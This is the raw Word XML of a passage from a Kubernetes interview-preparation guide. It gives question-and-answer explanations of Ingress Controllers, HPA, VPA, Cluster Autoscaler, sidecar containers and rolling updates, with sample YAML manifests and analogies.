        <w:tab/>
        <w:t>Ingress Controller</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes resource</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Running component/pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Defines rules</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Implements rules</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Function</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Declarative config</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Actual traffic handling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ingress = traffic rules written on paper</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ingress Controller = traffic police enforcing those rules</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key point</w:t>
        <w:br/>
        <w:t>Ingress Controller is the actual reverse proxy system that reads Ingress definitions and routes external traffic to Kubernetes services.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>An Ingress Controller in Kubernetes is a specialized component that watches Ingress resources and implements their routing rules by configuring a reverse proxy or load balancer to manage external HTTP/HTTPS traffic into services within the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q264. Explain NodePort service.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q265. What is ClusterIP?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q266. Pods communicate using service name or ClusterIP</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q267. Explain LoadBalancer service.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q268. What is HPA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HPA (Horizontal Pod Autoscaler) in Kubernetes is a feature that automatically scales the number of pod replicas up or down based on resource usage or custom metrics.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>HPA adjusts the number of running Pods dynamically based on demand.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High load → more pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Low load → fewer pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why HPA is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handle traffic spikes automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improve application availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Optimize resource usage (cost efficiency)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid manual scaling</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How HPA works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. HPA continuously monitors metrics (via Metrics Server)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. It compares current usage with target values</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. It adjusts replica count of a Deployment/ReplicaSet/StatefulSet</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common metrics used</w:t>
        <w:br/>
        <w:t>1. CPU utilization (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: keep CPU usage at 60%</w:t>
        <w:br/>
        <w:t>2. Memory usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scale based on memory consumption</w:t>
        <w:br/>
        <w:t>3. Custom metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Requests per second</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Queue length</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Latency</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example HPA YAML</w:t>
        <w:br/>
        <w:t>apiVersion: autoscaling/v2</w:t>
        <w:br/>
        <w:t>kind: HorizontalPodAutoscaler</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app-hpa</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  scaleTargetRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    kind: Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name: my-app</w:t>
        <w:br/>
        <w:t xml:space="preserve">  minReplicas: 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  maxReplicas: 10</w:t>
        <w:br/>
        <w:t xml:space="preserve">  metrics:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - type: Resource</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resource:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      name: cpu</w:t>
        <w:br/>
        <w:t xml:space="preserve">      target:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        type: Utilization</w:t>
        <w:br/>
        <w:t xml:space="preserve">        averageUtilization: 60</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How scaling happens</w:t>
        <w:br/>
        <w:t>If CPU &gt; 60%</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HPA increases replicas (scale out)</w:t>
        <w:br/>
        <w:t>If CPU &lt; 60%</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HPA decreases replicas (scale in)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>HPA components</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Metrics Server (collects CPU/memory data)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HPA controller (decides scaling)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Target workload (Deployment/ReplicaSet)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>HPA vs VPA vs Cluster Autoscaler</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>HPA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>VPA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster Autoscaler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scales</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Direction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Horizontal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Vertical</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Infrastructure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traffic scaling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource tuning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster capacity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a restaurant:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = chefs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HPA = manager who hires more chefs during rush hours and sends them home during slow hours</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works with Deployment/ReplicaSet/StatefulSet</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Requires Metrics Server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Responds to real-time workload changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Has min and max replica limits</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not instant (has cooldown period)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Depends on metrics availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * May over/under-shoot in sudden spikes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>HPA in Kubernetes is a controller that automatically scales the number of pod replicas in a deployment based on observed metrics such as CPU or memory utilization, enabling applications to handle varying workloads efficiently by dynamically adjusting capacity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q269. Explain VPA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VPA (Vertical Pod Autoscaler) in Kubernetes is a mechanism that automatically adjusts the CPU and memory requests/limits of containers inside a Pod based on their actual usage.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>VPA scales up or down the resources of a pod, not the number of pods.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HPA → scales pods (horizontal)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * VPA → scales resources per pod (vertical)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why VPA is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Right-size CPU and memory automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prevent over-provisioning (waste)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prevent under-provisioning (crashes/OOMKilled)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improve cluster resource efficiency</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How VPA works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. VPA collects historical and real-time usage metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. It analyzes resource consumption patterns</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. It recommends or applies new CPU/memory values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q270. Pods are updated accordingly (often restarted)</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q271. What is Cluster Autoscaler?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cluster Autoscaler in Kubernetes is a component that automatically adjusts the number of worker nodes in a cluster based on pending pods and resource demand.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Cluster Autoscaler scales the infrastructure (nodes), not pods.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not enough capacity → adds nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Underutilized nodes → removes nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handle workloads that exceed current node capacity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid pod scheduling failures (Pending state)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Optimize cloud cost by removing unused nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enable fully automated cluster scaling</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>Scale-up (add nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Scheduler finds pods that cannot be placed (Pending state)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Cluster Autoscaler detects insufficient resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. It requests new nodes from cloud provider</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. New nodes join the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Pending pods get scheduled</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Scale-down (remove nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Detects underutilized nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Checks if pods can be safely moved elsewhere</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Evicts pods and drains node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Removes node from cluster</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow (conceptual)</w:t>
        <w:br/>
        <w:t>Pending Pods → Cluster Autoscaler → Cloud Provider → New Nodes → Scheduler → Pods scheduled</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where it runs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Usually deployed as a system pod inside the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works with cloud providers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS (ASG / EKS)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Azure (AKS)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GCP (GKE)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key conditions for scaling down</w:t>
        <w:br/>
        <w:t>A node is removed only if:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * All pods can be safely rescheduled</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods are not using local storage (or are safely managed)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod disruption budgets allow it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No critical system workload is affected</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Cluster Autoscaler vs HPA vs VPA</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster Autoscaler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>HPA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>VPA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scales</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Infrastructure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Application</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Trigger</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pending pods / utilization</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CPU/memory/custom metrics</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Usage patterns</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Effect</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Adds/removes machines</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Adds/removes replicas</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Changes CPU/memory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a factory:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = workers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Nodes = factory floors</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster Autoscaler = construction manager who builds or removes floors based on worker demand</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works with cloud provider APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Responds to unschedulable pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Optimizes cost automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works alongside HPA and VPA</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scaling is not instant (node provisioning delay)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Depends on cloud provider capacity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * May take time to stabilize during spikes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use with HPA for full elasticity (pods + nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Set proper resource requests for accurate scheduling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use Pod Disruption Budgets for safe scaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid aggressive scale-down settings in production</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Cluster Autoscaler in Kubernetes is a component that automatically adjusts the number of worker nodes in a cluster based on resource demand by adding nodes when pods are unschedulable and removing underutilized nodes to optimize cost and resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q272. Explain liveness probes.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q273. What are readiness probes?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q274. When probe passes again:</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q275. Explain startup probes.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q276. What is persistent volume?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q277. Explain persistent volume claims.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q278. What is storage class?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q279. Explain init containers.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q280. What are sidecar containers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A sidecar container in Kubernetes is a helper container that runs alongside the main application container inside the same Pod to provide supporting functionality.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A sidecar container enhances or extends the main application without changing its code.</w:t>
        <w:br/>
        <w:t>It runs continuously alongside the main container, not before it like an init container.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why sidecar containers are used</w:t>
        <w:br/>
        <w:t>They help offload common responsibilities such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Logging</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Proxying traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configuration syncing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service mesh functions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Main container runs the application</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sidecar container runs helper logic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Both share:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Network namespace (same IP)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Storage volumes (if defined)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * They communicate via localhost or shared files</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common use cases</w:t>
        <w:br/>
        <w:t>1. Logging agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Collects logs from app and ships to ELK / CloudWatch</w:t>
        <w:br/>
        <w:t>2. Monitoring agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Exposes metrics (Prometheus exporter)</w:t>
        <w:br/>
        <w:t>3. Service mesh proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: Envoy proxy in Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles traffic routing, retries, TLS</w:t>
        <w:br/>
        <w:t>4. Config sync</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Watches config changes and updates app files</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-with-sidecar</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  - name: log-agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: fluentd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How communication happens</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Shared network: localhost</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Shared volumes: log files, configs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Inter-container communication is fast and secure</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Sidecar vs Init container</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sidecar</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Init Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>When runs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Along with app</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Before app starts</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lifecycle</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Continuous</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finishes and exits</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Support runtime tasks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Setup tasks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No (unless Pod restarts)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a car:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Main container = driver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sidecar container = GPS, music system, or dashboard assistant</w:t>
        <w:br/>
        <w:t>They help the driver but are not the main function.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs in same Pod as application</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Shares networking and storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Always running with main container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enhances functionality without modifying app code</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world example (service mesh)</w:t>
        <w:br/>
        <w:t>In systems like Istio:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sidecar = Envoy proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * traffic routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * retries</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * security (mTLS)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * observability</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A sidecar container in Kubernetes is a supporting container that runs alongside the main application container in the same Pod, sharing the same network and storage, and provides auxiliary functionalities such as logging, monitoring, proxying, or configuration management without modifying the main application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q281. Explain pod lifecycle.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q282. What is rolling update?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Rolling Update in Kubernetes is a deployment strategy that updates application instances gradually by replacing old Pods with new ones, without downtime.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Rolling update replaces Pods one by one (or in small batches) instead of stopping everything at once.</w:t>
        <w:br/>
        <w:t>This ensures the application remains available during deployment.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why rolling updates are used</w:t>
        <w:br/>
        <w:t>They help to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid downtime during deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Gradually shift traffic to new version</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Detect issues early in production</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enable safe, continuous delivery</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
